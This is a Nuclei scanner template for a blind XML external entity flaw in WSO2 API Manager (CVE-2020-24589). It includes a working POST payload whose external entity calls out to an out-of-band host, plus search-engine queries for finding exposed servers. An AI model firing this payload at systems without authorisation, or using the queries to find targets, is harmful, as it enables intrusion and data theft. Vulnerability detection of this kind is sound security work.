WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
ID: CVE-2020-24589
Severity: critical
Author: lethargynavigator
Tags: cve2020,cve,wso2,xxe,oast,blind
Description
WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to read files on the server file system and to interact with any backend or external systems the application itself can reach, which lets the attacker exfiltrate sensitive data from the compromised server to a system under the attacker's control. This variant is blind: nothing from the resolved entity is reflected in the HTTP response, so the template confirms the parser's external fetch through an out-of-band (OAST) callback to an interactsh host rather than through the response body.
YAML Source
id: CVE-2020-24589

info:
  name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
  author: lethargynavigator
  severity: critical
  description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.
  remediation: |
    Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.
  reference:
    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24589
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/athiththan11/WSO2-CVE-Extractor
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2020-24589
    cwe-id: CWE-611
    epss-score: 0.64778
    epss-percentile: 0.97891
    cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wso2
    product: api_manager
    shodan-query: http.favicon.hash:1398055326
    fofa-query: icon_hash=1398055326
    google-query: inurl:"carbon/admin/login"
  tags: cve2020,cve,wso2,xxe,oast,blind

http:
  - raw:
      - |
        POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "Failed to install the generic artifact type"
# digest: 4a0a00473045022100cfb3695d96b98f29d8d47781e75d8de6656dce3b0ee47698a3b1109f645e228502203dd3ccef878160000fcc4cc7e0755eb135bb17ccd4fb2ea05aa8d60aa0e39682:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template sends a single POST to /carbon/generic/save_artifact_ajaxprocessor.jsp whose payload parameter carries a DOCTYPE with an external parameter entity pointing at an interactsh URL. The finding is reported only when both matchers hold: the interactsh server records an HTTP interaction from the target (the parser fetched the entity) and the response body contains "Failed to install the generic artifact type". Because the check is out-of-band, the scanning host needs outbound access to an interactsh server; Nuclei uses the public one by default, or pass your own with -iserver.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-24589.yaml"